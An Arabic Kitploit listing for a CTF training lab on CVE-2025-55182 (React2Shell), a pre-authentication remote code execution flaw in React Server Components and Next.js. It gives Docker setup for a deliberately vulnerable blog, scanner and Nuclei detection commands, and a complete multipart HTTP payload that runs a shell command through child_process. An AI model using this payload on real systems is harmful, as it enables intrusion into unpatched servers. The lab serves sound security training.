Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-React2Shell-Lab — بيئة مختبر CTF تستغل CVE-2025-55182 (RCE في مكونات خادم React) مع مدونة Next.js قابلة للاختراق، وسكريبتات كشف، وحمولات استغلال يدوية للتدريب الأمني العملي. | Kitploit
أدوات/GitHubGitHub/goultarde/cve-2025-55182-react2shell-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFالتعلم والتعليممختبرات وتدريب عملي
GitHubgoultarde/cve-2025-55182-react2shell-lab

CVE-2025-55182-React2Shell-Lab

بيئة مختبر CTF تستغل CVE-2025-55182 (RCE في مكونات خادم React) مع مدونة Next.js قابلة للاختراق، وسكريبتات كشف، وحمولات استغلال يدوية للتدريب الأمني العملي.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

مدونة CyberSec CTF - إثبات مفهوم React2Shell

يوفر هذا المستودع بيئة CTF (Capture The Flag) قابلة للاستغلال تعتمد على مدونة للأمن السيبراني تستخدم Next.js و React Server Components.

CVE-2025-55182 : ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) قبل المصادقة في React Server Components الإصدارات 19.0.0 و 19.1.0 و 19.1.1 و 19.2.0. يقوم الكود القابل للاستغلال بإلغاء تسلسل غير آمن لحمولات طلبات HTTP إلى نقاط نهاية Server Function.

CVE-2025-66478 : تأثير على تطبيقات Next.js التي تستخدم App Router.


وصف CTF

يقدم هذا التحدي مدونة للأمن السيبراني تحتوي على:

  • 5 مقالات حول مواضيع أمنية (Web, React, CTF, Next.js, إلغاء التسلسل)
  • 3 مؤلفين خياليين
  • واجهة حديثة بالوضع الداكن

تستخدم المدونة إصدارات قابلة للاستغلال من React و Next.js، مما يسمح باستغلال ثغرة React2Shell.

الإصدارات القابلة للاستغلال المستخدمة

الحزمةالإصدار
next16.0.6
react19.2.0
react-dom19.2.0

كيفية تشغيل CTF

باستخدام Docker (موصى به)

root@kitploit:~
# بناء الصورة
docker build -t react2shell-poc .

# تشغيل الحاوية
docker run --rm -p 127.0.0.1:3000:3000 react2shell-poc

بدون Docker

root@kitploit:~
npm install
npm run build
npm run start

ثم انتقل إلى http://127.0.0.1:3000

كيفية اكتشاف الثغرة

باستخدام ماسح AssetNote

root@kitploit:~
git clone https://github.com/assetnote/react2shell-scanner && cd react2shell-scanner
virtualenv venv && source venv/bin/activate && pip install -r requirements.txt

python3 scanner.py -u http://127.0.0.1:3000

باستخدام Nuclei

root@kitploit:~
nuclei -t ./nuclei-template/CVE-2025-55182.yaml -u http://127.0.0.1:3000

كيفية الاستغلال

باستخدام أداة React2Shell

انظر مجلد React2Shell/ لاستغلال Python.

حمولة HTTP يدوية

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

سيحتوي الرد على نتيجة الأمر id في الترويسة x-action-redirect.

المراجع

  • تنبيه أمني: ثغرات RCE حرجة في React Server Components و Next.js
  • CVE-2025-55182 - NVD
  • CVE-2025-66478 - تنبيه أمني من Next.js
  • ماسح React2Shell - AssetNote

تحدي CTF مخصص بناءً على قالب simple-nextjs-blog والبيئة القابلة للاستغلال CVE-2025-55182.

تنزيل الأداة